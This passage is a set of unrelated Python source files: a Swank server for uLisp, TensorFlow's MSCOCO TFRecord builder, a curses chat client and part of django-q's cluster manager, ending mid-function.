all updates into image buffer t = threading.Thread(target=main) t.setDaemon(1) t.start() t = threading.Thread(target=open_browser) t.setDaemon(1) t.start() """ okay, what we need now is a simple safe way to pass comands and arguments through the client brower, with escape characters, etc. ideally, we'd like a javascript object which responds to the same messages as PyMOL for our initial test, let's just put up some button links to control representations. also outstanding: - how does one send asynchronous javascript URL requests? - we also need some way to package up images in PyMOL without passaging through the file systems - we also need to decide what this initial user interface is going to do """
server.py
# -*- coding: utf-8 -*- import logging import socket import sys from threading import Thread import logconfig from lisp import LispReader from protocol import SwankProtocol from repl import repl import ulisp try: import SocketServer as socketserver except ImportError: # Python 3 support import socketserver __all__ = ['HEADER_LENGTH', 'SwankServerRequestHandler', 'SwankServer', 'serve'] logconfig.configure() HEADER_LENGTH = 6 PROMPT = "ULISP> " LOCALS = {"__name__": "__console__", "__doc__": None} class SwankServerRequestHandler(socketserver.BaseRequestHandler): """Request handler for the SwankServer. Handle protocol requests from swank client by dispatching received data to SwankProtocol.dispatch and returns to the client whatever it replies. """ def __init__(self, request, client_address, server): encodings = { "iso-latin-1-unix": "latin-1", "iso-utf-8-unix": "utf-8" } self.encoding = encodings.get(server.encoding, "utf-8") self.protocol = SwankProtocol( server.socket, locals=LOCALS, prompt=PROMPT ) socketserver.BaseRequestHandler.__init__( self, request, client_address, server) def handle(self): logging.debug('handle') first = True while True: try: raw = self.request.recv(HEADER_LENGTH) logging.debug('raw()->"%s"', raw) if raw: length = int(raw, 16) else: logging.error('Empty header received') self.request.close() break; data = self.request.recv(length) logging.debug('recv()->"%s"', data) if first: ret = self.protocol.indentation_update() ret = ret.encode(self.encoding) logging.debug('send()->"%s"', ret) self.request.send(ret) data = data.decode(self.encoding) logging.debug('dispatching -> %s', data) ret = self.protocol.dispatch(data) logging.debug('dispatch -> %s', str(ret)) ret = ret.encode(self.encoding) self.request.send(ret) first = False except socket.timeout as e: logging.error('Socket error %s', str(e)) break class SwankServer(socketserver.TCPServer): """Good ol' TCPServer using SwankServerRequestHandler as handler.""" def __init__(self, server_address, handler_class=SwankServerRequestHandler, port_filename=None, encoding="utf-8"): self.port_filename = port_filename self.encoding = encoding server = socketserver.TCPServer.__init__(self, server_address, handler_class) ipaddr, port = self.server_address logging.info('Serving on: {0} ({1})'.format(ipaddr, port)) if port_filename: with open(port_filename, 'w') as port_file: logging.debug('Writing port_file {0}'.format(port_filename)) port_file.write("{0}".format(port)) def serve(ipaddr="127.0.0.1", port=0, port_filename=None, encoding="utf-8"): """Start a swank server on given port. If no port is provided then let the OS choose it. """ server = SwankServer((ipaddr, port), port_filename=port_filename, encoding=encoding) server.serve_forever() def swank_process(ipaddr="127.0.0.1", port=0, port_filename=None, encoding="utf-8"): server = Thread( target=serve, args=(ipaddr, port, port_filename, encoding) ) server.start() server.join(3) console = Thread( target=repl, kwargs=dict(prompt=PROMPT, locals=LOCALS, stdin=sys.stdin, stderr=sys.stderr) ) console.start() console.join() def main(read_input=False): """Main entry point. pro Args: read_input: if True parses the setup using raw_input to detect port_file instead of reading commandline arguments. """ ipaddr = "127.0.0.1" port = 0 encoding = "utf-8" port_filename = None board = "Adafruit Feather M4" logging.info("Waiting for setup string...") try: # At startup slime sends setup code like this as raw input: # (progn # (load "/home/user/.emacs.d/slime/swank-loader.lisp" :verbose t) # (funcall (read-from-string "swank-loader:init")) # (funcall (read-from-string "swank:start-server") "/tmp/slime.9999")) # This parses it and retrieves the port file to start the connection. try: setup = LispReader(raw_input()).read() except NameError: setup = LispReader(input()).read() if setup: port_filename = setup[-1][-1] except: logging.exception("Cannot parse setup from stdin. Parsing args...") if port_filename is None: logging.info("No setup string detected, parsing args...") try: import argparse parser = argparse.ArgumentParser() parser.add_argument("-b", "--board", help="name of the board to connect to") parser.add_argument("-a", "--ipaddr", help="bind address", default=ipaddr) parser.add_argument("-p", "--port", type=int, help="port", default=port) parser.add_argument("-f", "--port-filename") parser.add_argument("-e", "--encoding", default=encoding) args = parser.parse_args() except ImportError: import optparse parser = optparse.OptionParser() parser.add_option("-b", "--board", help="name of the board to connect to") parser.add_option("-a", "--ipaddr", help="bind address", default=ipaddr) parser.add_option("-p", "--port", type=int, help="port", default=port) parser.add_option("-f", "--port-filename") parser.add_option("-e", "--encoding", default=encoding) (args, _) = parser.parse_args() ipaddr = args.ipaddr port = args.port port_filename = args.port_filename encoding = args.encoding board = args.board logging.debug("%s", { 'ipaddr': ipaddr, 'port': port, 'port_filename': port_filename, 'encoding': encoding, 'board': board }) logging.info("Finding ulisp port") ulisp.open_port(board) swank_process(ipaddr, int(port), port_filename, encoding) if __name__ == "__main__": main()
build_mscoco_data.py
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Converts MSCOCO data to TFRecord file format with SequenceExample protos. The MSCOCO images are expected to reside in JPEG files located in the following directory structure: train_image_dir/COCO_train2014_000000000151.jpg train_image_dir/COCO_train2014_000000000260.jpg ... and val_image_dir/COCO_val2014_000000000042.jpg val_image_dir/COCO_val2014_000000000073.jpg ... The MSCOCO annotations JSON files are expected to reside in train_captions_file and val_captions_file respectively. This script converts the combined MSCOCO data into sharded data files consisting of 256, 4 and 8 TFRecord files, respectively: output_dir/train-00000-of-00256 output_dir/train-00001-of-00256 ... output_dir/train-00255-of-00256 and output_dir/val-00000-of-00004 ... output_dir/val-00003-of-00004 and output_dir/test-00000-of-00008 ... output_dir/test-00007-of-00008 Each TFRecord file contains ~2300 records. Each record within the TFRecord file is a serialized SequenceExample proto consisting of precisely one image-caption pair. Note that each image has multiple captions (usually 5) and therefore each image is replicated multiple times in the TFRecord files. The SequenceExample proto contains the following fields: context: image/image_id: integer MSCOCO image identifier image/data: string containing JPEG encoded image in RGB colorspace feature_lists: image/caption: list of strings containing the (tokenized) caption words image/caption_ids: list of integer ids corresponding to the caption words The captions are tokenized using the NLTK (http://www.nltk.org/) word tokenizer. The vocabulary of word identifiers is constructed from the sorted list (by descending frequency) of word tokens in the training set. Only tokens appearing at least 4 times are considered; all other words get the "unknown" word id. NOTE: This script will consume around 100GB of disk space because each image in the MSCOCO dataset is replicated ~5 times (once per caption) in the output. This is done for two reasons: 1. In order to better shuffle the training data. 2. It makes it easier to perform asynchronous preprocessing of each image in TensorFlow. Running this script using 16 threads may take around 1 hour on a HP Z420. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function from collections import Counter from collections import namedtuple from datetime import datetime import json import os.path import random import sys import threading import nltk.tokenize import numpy as np from six.moves import xrange import tensorflow as tf tf.flags.DEFINE_string("train_image_dir", "/tmp/train2014/", "Training image directory.") tf.flags.DEFINE_string("val_image_dir", "/tmp/val2014", "Validation image directory.") tf.flags.DEFINE_string("train_captions_file", "/tmp/captions_train2014.json", "Training captions JSON file.") tf.flags.DEFINE_string("val_captions_file", "/tmp/captions_val2014.json", "Validation captions JSON file.") tf.flags.DEFINE_string("output_dir", "/tmp/", "Output data directory.") tf.flags.DEFINE_integer("train_shards", 256, "Number of shards in training TFRecord files.") tf.flags.DEFINE_integer("val_shards", 4, "Number of shards in validation TFRecord files.") tf.flags.DEFINE_integer("test_shards", 8, "Number of shards in testing TFRecord files.") tf.flags.DEFINE_string("start_word", "<S>", "Special word added to the beginning of each sentence.") tf.flags.DEFINE_string("end_word", "</S>", "Special word added to the end of each sentence.") tf.flags.DEFINE_string("unknown_word", "<UNK>", "Special word meaning 'unknown'.") tf.flags.DEFINE_integer("min_word_count", 4, "The minimum number of occurrences of each word in the " "training set for inclusion in the vocabulary.") tf.flags.DEFINE_string("word_counts_output_file", "/tmp/word_counts.txt", "Output vocabulary file of word counts.") tf.flags.DEFINE_integer("num_threads", 8, "Number of threads to preprocess the images.") FLAGS = tf.flags.FLAGS ImageMetadata = namedtuple("ImageMetadata", ["image_id", "filename", "captions"]) class Vocabulary(object): """Simple vocabulary wrapper.""" def __init__(self, vocab, unk_id): """Initializes the vocabulary. Args: vocab: A dictionary of word to word_id. unk_id: Id of the special 'unknown' word. """ self._vocab = vocab self._unk_id = unk_id def word_to_id(self, word): """Returns the integer id of a word string.""" if word in self._vocab: return self._vocab[word] else: return self._unk_id class ImageDecoder(object): """Helper class for decoding images in TensorFlow.""" def __init__(self): # Create a single TensorFlow Session for all image decoding calls. self._sess = tf.Session() # TensorFlow ops for JPEG decoding. self._encoded_jpeg = tf.placeholder(dtype=tf.string) self._decode_jpeg = tf.image.decode_jpeg(self._encoded_jpeg, channels=3) def decode_jpeg(self, encoded_jpeg): image = self._sess.run(self._decode_jpeg, feed_dict={self._encoded_jpeg: encoded_jpeg}) assert len(image.shape) == 3 assert image.shape[2] == 3 return image def _int64_feature(value): """Wrapper for inserting an int64 Feature into a SequenceExample proto.""" return tf.train.Feature(int64_list=tf.train.Int64List(value=[value])) def _bytes_feature(value): """Wrapper for inserting a bytes Feature into a SequenceExample proto.""" return tf.train.Feature(bytes_list=tf.train.BytesList(value=[str(value)])) def _int64_feature_list(values): """Wrapper for inserting an int64 FeatureList into a SequenceExample proto.""" return tf.train.FeatureList(feature=[_int64_feature(v) for v in values]) def _bytes_feature_list(values): """Wrapper for inserting a bytes FeatureList into a SequenceExample proto.""" return tf.train.FeatureList(feature=[_bytes_feature(v) for v in values]) def _to_sequence_example(image, decoder, vocab): """Builds a SequenceExample proto for an image-caption pair. Args: image: An ImageMetadata object. decoder: An ImageDecoder object. vocab: A Vocabulary object. Returns: A SequenceExample proto. """ with tf.gfile.FastGFile(image.filename, "r") as f: encoded_image = f.read() try: decoder.decode_jpeg(encoded_image) except (tf.errors.InvalidArgumentError, AssertionError): print("Skipping file with invalid JPEG data: %s" % image.filename) return context = tf.train.Features(feature={ "image/image_id": _int64_feature(image.image_id), "image/data": _bytes_feature(encoded_image), }) assert len(image.captions) == 1 caption = image.captions[0] caption_ids = [vocab.word_to_id(word) for word in caption] feature_lists = tf.train.FeatureLists(feature_list={ "image/caption": _bytes_feature_list(caption), "image/caption_ids": _int64_feature_list(caption_ids) }) sequence_example = tf.train.SequenceExample( context=context, feature_lists=feature_lists) return sequence_example def _process_image_files(thread_index, ranges, name, images, decoder, vocab, num_shards): """Processes and saves a subset of images as TFRecord files in one thread. Args: thread_index: Integer thread identifier within [0, len(ranges)]. ranges: A list of pairs of integers specifying the ranges of the dataset to process in parallel. name: Unique identifier specifying the dataset. images: List of ImageMetadata. decoder: An ImageDecoder object. vocab: A Vocabulary object. num_shards: Integer number of shards for the output files. """ # Each thread produces N shards where N = num_shards / num_threads. For # instance, if num_shards = 128, and num_threads = 2, then the first thread # would produce shards [0, 64). num_threads = len(ranges) assert not num_shards % num_threads num_shards_per_batch = int(num_shards / num_threads) shard_ranges = np.linspace(ranges[thread_index][0], ranges[thread_index][1], num_shards_per_batch + 1).astype(int) num_images_in_thread = ranges[thread_index][1] - ranges[thread_index][0] counter = 0 for s in xrange(num_shards_per_batch): # Generate a sharded version of the file name, e.g. 'train-00002-of-00010' shard = thread_index * num_shards_per_batch + s output_filename = "%s-%.5d-of-%.5d" % (name, shard, num_shards) output_file = os.path.join(FLAGS.output_dir, output_filename) writer = tf.python_io.TFRecordWriter(output_file) shard_counter = 0 images_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int) for i in images_in_shard: image = images[i] sequence_example = _to_sequence_example(image, decoder, vocab) if sequence_example is not None: writer.write(sequence_example.SerializeToString()) shard_counter += 1 counter += 1 if not counter % 1000: print("%s [thread %d]: Processed %d of %d items in thread batch." % (datetime.now(), thread_index, counter, num_images_in_thread)) sys.stdout.flush() writer.close() print("%s [thread %d]: Wrote %d image-caption pairs to %s" % (datetime.now(), thread_index, shard_counter, output_file)) sys.stdout.flush() shard_counter = 0 print("%s [thread %d]: Wrote %d image-caption pairs to %d shards." % (datetime.now(), thread_index, counter, num_shards_per_batch)) sys.stdout.flush() def _process_dataset(name, images, vocab, num_shards): """Processes a complete data set and saves it as a TFRecord. Args: name: Unique identifier specifying the dataset. images: List of ImageMetadata. vocab: A Vocabulary object. num_shards: Integer number of shards for the output files. """ # Break up each image into a separate entity for each caption. images = [ImageMetadata(image.image_id, image.filename, [caption]) for image in images for caption in image.captions] # Shuffle the ordering of images. Make the randomization repeatable. random.seed(12345) random.shuffle(images) # Break the images into num_threads batches. Batch i is defined as # images[ranges[i][0]:ranges[i][1]]. num_threads = min(num_shards, FLAGS.num_threads) spacing = np.linspace(0, len(images), num_threads + 1).astype(np.int) ranges = [] threads = [] for i in xrange(len(spacing) - 1): ranges.append([spacing[i], spacing[i + 1]]) # Create a mechanism for monitoring when all threads are finished. coord = tf.train.Coordinator() # Create a utility for decoding JPEG images to run sanity checks. decoder = ImageDecoder() # Launch a thread for each batch. print("Launching %d threads for spacings: %s" % (num_threads, ranges)) for thread_index in xrange(len(ranges)): args = (thread_index, ranges, name, images, decoder, vocab, num_shards) t = threading.Thread(target=_process_image_files, args=args) t.start() threads.append(t) # Wait for all the threads to terminate. coord.join(threads) print("%s: Finished processing all %d image-caption pairs in data set '%s'." % (datetime.now(), len(images), name)) def _create_vocab(captions): """Creates the vocabulary of word to word_id. The vocabulary is saved to disk in a text file of word counts. The id of each word in the file is its corresponding 0-based line number. Args: captions: A list of lists of strings. Returns: A Vocabulary object. """ print("Creating vocabulary.") counter = Counter() for c in captions: counter.update(c) print("Total words:", len(counter)) # Filter uncommon words and sort by descending count. word_counts = [x for x in counter.items() if x[1] >= FLAGS.min_word_count] word_counts.sort(key=lambda x: x[1], reverse=True) print("Words in vocabulary:", len(word_counts)) # Write out the word counts file. with tf.gfile.FastGFile(FLAGS.word_counts_output_file, "w") as f: f.write("\n".join(["%s %d" % (w, c) for w, c in word_counts])) print("Wrote vocabulary file:", FLAGS.word_counts_output_file) # Create the vocabulary dictionary. reverse_vocab = [x[0] for x in word_counts] unk_id = len(reverse_vocab) vocab_dict = dict([(x, y) for (y, x) in enumerate(reverse_vocab)]) vocab = Vocabulary(vocab_dict, unk_id) return vocab def _process_caption(caption): """Processes a caption string into a list of tonenized words. Args: caption: A string caption. Returns: A list of strings; the tokenized caption. """ tokenized_caption = [FLAGS.start_word] tokenized_caption.extend(nltk.tokenize.word_tokenize(caption.lower())) tokenized_caption.append(FLAGS.end_word) return tokenized_caption def _load_and_process_metadata(captions_file, image_dir): """Loads image metadata from a JSON file and processes the captions. Args: captions_file: JSON file containing caption annotations. image_dir: Directory containing the image files. Returns: A list of ImageMetadata. """ with tf.gfile.FastGFile(captions_file, "r") as f: caption_data = json.load(f) # Extract the filenames. id_to_filename = [(x["id"], x["file_name"]) for x in caption_data["images"]] # Extract the captions. Each image_id is associated with multiple captions. id_to_captions = {} for annotation in caption_data["annotations"]: image_id = annotation["image_id"] caption = annotation["caption"] id_to_captions.setdefault(image_id, []) id_to_captions[image_id].append(caption) assert len(id_to_filename) == len(id_to_captions) assert set([x[0] for x in id_to_filename]) == set(id_to_captions.keys()) print("Loaded caption metadata for %d images from %s" % (len(id_to_filename), captions_file)) # Process the captions and combine the data into a list of ImageMetadata. print("Processing captions.") image_metadata = [] num_captions = 0 for image_id, base_filename in id_to_filename: filename = os.path.join(image_dir, base_filename) captions = [_process_caption(c) for c in id_to_captions[image_id]] image_metadata.append(ImageMetadata(image_id, filename, captions)) num_captions += len(captions) print("Finished processing %d captions for %d images in %s" % (num_captions, len(id_to_filename), captions_file)) return image_metadata def main(unused_argv): def _is_valid_num_shards(num_shards): """Returns True if num_shards is compatible with FLAGS.num_threads.""" return num_shards < FLAGS.num_threads or not num_shards % FLAGS.num_threads assert _is_valid_num_shards(FLAGS.train_shards), ( "Please make the FLAGS.num_threads commensurate with FLAGS.train_shards") assert _is_valid_num_shards(FLAGS.val_shards), ( "Please make the FLAGS.num_threads commensurate with FLAGS.val_shards") assert _is_valid_num_shards(FLAGS.test_shards), ( "Please make the FLAGS.num_threads commensurate with FLAGS.test_shards") if not tf.gfile.IsDirectory(FLAGS.output_dir): tf.gfile.MakeDirs(FLAGS.output_dir) # Load image metadata from caption files. mscoco_train_dataset = _load_and_process_metadata(FLAGS.train_captions_file, FLAGS.train_image_dir) mscoco_val_dataset = _load_and_process_metadata(FLAGS.val_captions_file, FLAGS.val_image_dir) # Redistribute the MSCOCO data as follows: # train_dataset = 100% of mscoco_train_dataset + 85% of mscoco_val_dataset. # val_dataset = 5% of mscoco_val_dataset (for validation during training). # test_dataset = 10% of mscoco_val_dataset (for final evaluation). train_cutoff = int(0.85 * len(mscoco_val_dataset)) val_cutoff = int(0.90 * len(mscoco_val_dataset)) train_dataset = mscoco_train_dataset + mscoco_val_dataset[0:train_cutoff] val_dataset = mscoco_val_dataset[train_cutoff:val_cutoff] test_dataset = mscoco_val_dataset[val_cutoff:] # Create vocabulary from the training captions. train_captions = [c for image in train_dataset for c in image.captions] vocab = _create_vocab(train_captions) _process_dataset("train", train_dataset, vocab, FLAGS.train_shards) _process_dataset("val", val_dataset, vocab, FLAGS.val_shards) _process_dataset("test", test_dataset, vocab, FLAGS.test_shards) if __name__ == "__main__": tf.app.run()
gui.py
import curses from curses import textpad import os import threading import traceback import time import client import curses_util class GUI(): def __init__(self, stdscr): global client_obj self.client_obj = client_obj self.username = 'G' self.password = 'password' self.y = 10 self.msg_list = [] threading.Thread(target=self.receive_msg).start() self.to = '$user$:G:' self.msg = '' self.last_msg = 'Nothing' curses.noecho() curses.curs_set(0) #curses.mousemask(1) #do not show cursor on click (turn off for debugging) curses.start_color() self.stdscr = stdscr self.stdscr.erase() #self.stdscr.nodelay(1) y, x = self.stdscr.getmaxyx() x1 = round((x/12)*3) x2 = x1 + round((x/12)*7) self.tab_focus = 'dashboard' self.draw_widgets(init = True) self.main() def draw_widgets(self, init=False): self.stdscr.erase() y, x = self.stdscr.getmaxyx() print(y, x) x1 = round((x/12)*3) x2 = x1 + round((x/12)*7) height_chats = round(y/2) groups_height = y - height_chats self.status_bar = self.stdscr.subwin(2, round((x/12)*7), 0, x1) self.status_bar.box() self.text_box_bar = self.stdscr.subwin(3, round((x/12)*7), round(y)-3, x1) #rows, columns, y, x self.text_box_bar.box() self.main_win = self.stdscr.subwin(round(y)-5, round((x/12)*7), 2, x1) self.main_win.box() try: self.active_users_win = self.stdscr.subwin(round(y), round((x/12)*2), 0, x2) except curses.error: self.active_users_win = self.stdscr.subwin(round(y), round((x/12)*2), 0, x2-1) self.active_users_win.box() ''' Chats and Groups ''' self.chats_win_chats = self.stdscr.subwin(height_chats, round((x/12)*3), 0, 0) #rows, columns, y, x self.chats_win_chats.box() self.chats_win_groups = self.stdscr.subwin(groups_height, round((x/12)*3), height_chats, 0) #rows, columns, y, x self.chats_win_groups.box() self.stdscr.addstr(0, 2, 'Chats') self.stdscr.addstr(height_chats, 2, 'Groups') if init == True: self.clock = curses_util.Clock(self.stdscr, 0, round((x/12)*3 + 2)) self.tb = curses_util.Textbox(self.stdscr, round(y)-2, x1+1) self.dashboard = curses_util.Scrollpad(self.stdscr, 1024*1024, round((x/12)*7)-2, uy=3, ux=(x1+1), dy=round(y)-6, dx=(x1+1)+round((x/12)*7)-3) self.chats_dashboard = curses_util.AdvancedScrollpad(self.stdscr, 1024*1024, round((x/12)*3)-3, uy=2, ux=2, dy=height_chats-2, dx=round((x/12)*3)-3) #self.chats_dashboard.load_file(os.getcwd() + '\\chats.txt') self.dashboard.resize(lines=(1024*1024), columns=(round((x/12)*7)-2), uy=3, ux=(x1+1), dy=round(y)-6, dx=(x1+1)+round((x/12)*7)-3) self.chats_dashboard.resize(lines=(1024*1024), columns=(round((x/12)*3)-3), uy=2, ux=2, dy=height_chats-2, dx=round((x/12)*3)-3) textbox_text = self.tb.text #print(textbox_text) self.tb = None self.tb = curses_util.Textbox(self.stdscr, round(y)-2, x1+1, text=textbox_text) self.tb.rewrite(textbox_text) ''' Status bar ''' self.clock.redraw(self.stdscr, round((x/12)*3 + 2)) self.stdscr.refresh() def receive_msg(self): while True: time.sleep(0.0001) self.msg = self.client_obj.msg #print(self.msg) if self.msg != None and self.last_msg != self.msg: print(self.msg) self.last_msg = self.msg print('Processing...') user_list = self.msg.split('@', 1) user = user_list[0] msg_list = user_list[1].split(':', 1) where = msg_list[0] msg = msg_list[1] y, x = self.stdscr.getmaxyx() self.y += 2 self.x = round((x/12)*3) print(user, msg) ''' Format msg ''' self.msg = self.msg.replace('\\n', '\n') self.dashboard.add_text(str(user) + ': ', 4) self.dashboard.add_text(str(msg), 2) self.stdscr.refresh() def main(self): try: self.draw_widgets() while True: time.sleep(0.0001) key = self.stdscr.getch() print(key) if self.tab_focus == 'dashboard': self.dashboard.input(key) elif self.tab_focus == 'chats': self.chats_dashboard.input(key) elif self.tab_focus == 'groups': pass else: self.tab_focus = 'dashboard' #print('INPUT') if key != curses.KEY_RESIZE:# and key != curses.KEY_UP and key != curses.KEY_DOWN: if key == 351: if self.tab_focus == 'dashboard': self.tab_focus = 'chats' elif self.tab_focus == 'chats': self.tab_focus = 'groups' elif self.tab_focus == 'groups': self.tab_focus = 'dashboard' else: self.tab_focus = 'dashboard' if key == curses.KEY_MOUSE: pass if key != curses.KEY_UP and key != curses.KEY_DOWN and key != curses.KEY_MOUSE and key != 351: self.tb.key_input(key) #self.stdscr.refresh() #self.stdscr.doupdate() #print(key) #for debugging if key == 289:# or curses.KEY_F1: #for debugging break elif key == 8: #self.draw_widgets() pass elif key == curses.KEY_ENTER or key == 10 or key == 13: self.client_obj.to = self.to self.client_obj.send(self.tb.text) self.dashboard.add_text('$YOU$' + ': ', 6) self.dashboard.add_text(str(self.tb.text), 3) self.tb.empty() else: pass else: curses.resize_term(0, 0) self.stdscr.erase() self.draw_widgets() #self.tb.key_input(key) #self.msg = self.msg + chr(key) #self.stdscr.addstr(30, len(self.msg), chr(key)) except Exception as e: traceback.print_exc() curses.endwin() os._exit(1) class Window(): def __init__(self, stdscr, height, width, y, x): self.stdscr = stdscr self.win = self.stdscr.subwin(height, width, y, x) def redraw(self, height, width, y, x): self.win.erase() self.win = None self.win = self.stdscr.subwin(height, width, y, x) def main(): curses.wrapper(GUI) def start(client_obj_): global client_obj client_obj = client_obj_ main()
cluster.py
# Standard import ast import importlib import signal import socket import traceback import uuid from multiprocessing import Event, Process, Value, current_process from time import sleep # External import arrow # Django from django import db from django.conf import settings from django.utils import timezone from django.utils.translation import gettext_lazy as _ # Local import django_q.tasks from django_q.brokers import get_broker, Broker from django_q.conf import ( Conf, logger, psutil, get_ppid, error_reporter, croniter, resource, ) from django_q.humanhash import humanize from django_q.models import Task, Success, Schedule from django_q.queues import Queue from django_q.signals import pre_execute from django_q.signing import SignedPackage, BadSignature from django_q.status import Stat, Status class Cluster: def __init__(self, broker: Broker = None): self.broker = broker or get_broker() self.sentinel = None self.stop_event = None self.start_event = None self.pid = current_process().pid self.cluster_id = uuid.uuid4() self.host = socket.gethostname() self.timeout = Conf.TIMEOUT signal.signal(signal.SIGTERM, self.sig_handler) signal.signal(signal.SIGINT, self.sig_handler) def start(self) -> int: # Start Sentinel self.stop_event = Event() self.start_event = Event() self.sentinel = Process( target=Sentinel, args=( self.stop_event, self.start_event, self.cluster_id, self.broker, self.timeout, ), ) self.sentinel.start() logger.info(_(f"Q Cluster {self.name} starting.")) while not self.start_event.is_set(): sleep(0.1) return self.pid def stop(self) -> bool: if not self.sentinel.is_alive(): return False logger.info(_(f"Q Cluster {self.name} stopping.")) self.stop_event.set() self.sentinel.join() logger.info(_(f"Q Cluster {self.name} has stopped.")) self.start_event = None self.stop_event = None return True def sig_handler(self, signum, frame): logger.debug( _( f'{current_process().name} got signal {Conf.SIGNAL_NAMES.get(signum, "UNKNOWN")}' ) ) self.stop() @property def stat(self) -> Status: if self.sentinel: return Stat.get(pid=self.pid, cluster_id=self.cluster_id) return Status(pid=self.pid, cluster_id=self.cluster_id) @property def name(self) -> str: return humanize(self.cluster_id.hex) @property def is_starting(self) -> bool: return self.stop_event and self.start_event and not self.start_event.is_set() @property def is_running(self) -> bool: return self.stop_event and self.start_event and self.start_event.is_set() @property def is_stopping(self) -> bool: return ( self.stop_event and self.start_event and self.start_event.is_set() and self.stop_event.is_set() ) @property def has_stopped(self) -> bool: return self.start_event is None and self.stop_event is None and self.sentinel class Sentinel: def __init__( self, stop_event, start_event, cluster_id, broker=None, timeout=Conf.TIMEOUT, start=True, ): # Make sure we catch signals for the pool signal.signal(signal.SIGINT, signal.SIG_IGN) signal.signal(signal.SIGTERM, signal.SIG_DFL) self.pid = current_process().pid self.cluster_id = cluster_id self.parent_pid = get_ppid() self.name = current_process().name self.broker = broker or get_broker() self.reincarnations = 0 self.tob = timezone.now() self.stop_event = stop_event self.start_event = start_event self.pool_size = Conf.WORKERS self.pool = [] self.timeout = timeout self.task_queue = ( Queue(maxsize=Conf.QUEUE_LIMIT) if Conf.QUEUE_LIMIT else Queue() ) self.result_queue = Queue() self.event_out = Event() self.monitor = None self.pusher = None if start: self.start() def start(self): self.broker.ping() self.spawn_cluster() self.guard() def status(self) -> str: if not self.start_event.is_set() and not self.stop_event.is_set(): return Conf.STARTING elif self.start_event.is_set() and not self.stop_event.is_set(): if self.result_queue.empty() and self.task_queue.empty(): return Conf.IDLE return Conf.WORKING elif self.stop_event.is_set() and self.start_event.is_set(): if self.monitor.is_alive() or self.pusher.is_alive() or len(self.pool) > 0: return Conf.STOPPING return Conf.STOPPED def spawn_process(self, target, *args) -> Process: """ :type target: function or class """ p = Process(target=target, args=args) p.daemon = True if target == worker: p.daemon = Conf.DAEMONIZE_WORKERS p.timer = args[2] self.pool.append(p) p.start() return p def spawn_pusher(self) -> Process: return self.spawn_process(pusher, self.task_queue, self.event_out, self.broker) def spawn_worker(self): self.spawn_process( worker, self.task_queue, self.result_queue, Value("f", -1), self.timeout ) def spawn_monitor(self) -> Process: return self.spawn_process(monitor, self.result_queue, self.broker) def reincarnate(self, process): """ :param process: the process to reincarnate :type process: Process or None """ close_old_django_connections() if process == self.monitor: self.monitor = self.spawn_monitor() logger.error(_(f"reincarnated monitor {process.name} after sudden death")) elif process == self.pusher: self.pusher = self.spawn_pusher() logger.error(_(f"reincarnated pusher {process.name} after sudden death")) else: self.pool.remove(process) self.spawn_worker() if process.timer.value == 0: # only need to terminate on timeout, otherwise we risk destabilizing the queues process.terminate() logger.warning(_(f"reincarnated worker {process.name} after timeout")) elif int(process.timer.value) == -2: logger.info(_(f"recycled worker {process.name}")) else: logger.error(_(f"reincarnated worker {process.name} after death")) self.reincarnations += 1 def spawn_cluster(self): self.pool = [] Stat(self).save() close_old_django_connections() # spawn worker pool for __ in range(self.pool_size): self.spawn_worker() # spawn auxiliary self.monitor = self.spawn_monitor() self.pusher = self.spawn_pusher() # set worker cpu affinity if needed if psutil and Conf.CPU_AFFINITY: set_cpu_affinity(Conf.CPU_AFFINITY, [w.pid for w in self.pool]) def guard(self): logger.info( _( f"{current_process().name} guarding cluster {humanize(self.cluster_id.hex)}" ) ) self.start_event.set() Stat(self).save() logger.info(_(f"Q Cluster {humanize(self.cluster_id.hex)} running.")) counter = 0 cycle = Conf.GUARD_CYCLE # guard loop sleep in seconds # Guard loop. Runs at least once while not self.stop_event.is_set() or not counter: # Check Workers for p in self.pool: with p.timer.get_lock(): # Are you alive? if not p.is_alive() or p.timer.value == 0: self.reincarnate(p) continue # Decrement timer if work is being done if p.timer.value > 0: p.timer.value -= cycle # Check Monitor if not self.monitor.is_alive(): self.reincarnate(self.monitor) # Check Pusher if not self.pusher.is_alive(): self.reincarnate(self.pusher) # Call scheduler once a minute (or so) counter += cycle if counter >= 30 and Conf.SCHEDULER: counter = 0 scheduler(broker=self.broker) # Save current status Stat(self).save() sleep(cycle) self.stop() def stop(self): Stat(self).save() name = current_process().name logger.info(_(f"{name} stopping cluster processes")) # Stopping pusher self.event_out.set() # Wait for it to stop while self.pusher.is_alive(): sleep(0.1) Stat(self).save() # Put poison pills in the queue for __ in range(len(self.pool)): self.task_queue.put("STOP") self.task_queue.close() # wait for the task queue to empty self.task_queue.join_thread() # Wait for all the workers to exit while len(self.pool): for p in self.pool: if not p.is_alive(): self.pool.remove(p) sleep(0.1) Stat(self).save() # Finally stop the monitor self.result_queue.put("STOP") self.result_queue.close() # Wait for the result queue to empty self.result_queue.join_thread() logger.info(_(f"{name} waiting for the monitor.")) # Wait for everything to close or time out count = 0 if not self.timeout: self.timeout = 30 while self.status() == Conf.STOPPING and count < self.timeout * 10: sleep(0.1) Stat(self).save() count += 1 # Final status Stat(self).save() def pusher(task_queue: Queue, event: Event, broker: Broker = None): """ Pulls tasks of the broker and puts them in the task queue :type broker: :type task_queue: multiprocessing.Queue :type event: multiprocessing.Event """ if not broker: broker = get_broker() logger.info(_(f"{current_process().name} pushing tasks at {current_process().pid}")) while True: try: task_set = broker.dequeue() except Exception as e: logger.error(e, traceback.format_exc()) # broker probably crashed. Let the sentinel handle it. sleep(10) break if task_set: for task in task_set: ack_id = task[0] # unpack the task try: task = SignedPackage.loads(task[1]) except (TypeError, BadSignature) as e: logger.error(e, traceback.format_exc()) broker.fail(ack_id) continue task["ack_id"] = ack_id task_queue.put(task) logger.debug(_(f"queueing from {broker.list_key}")) if event.is_set(): break logger.info(_(f"{current_process().name} stopped pushing tasks")) def monitor(result_queue: Queue, broker: Broker = None): """ Gets finished tasks from the result queue and saves them to Django :type broker: brokers.Broker :type result_queue: multiprocessing.Queue """ if not broker: broker = get_broker() name = current_process().name logger.info(_(f"{name} monitoring at {current_process().pid}")) for task in iter(result_queue.get, 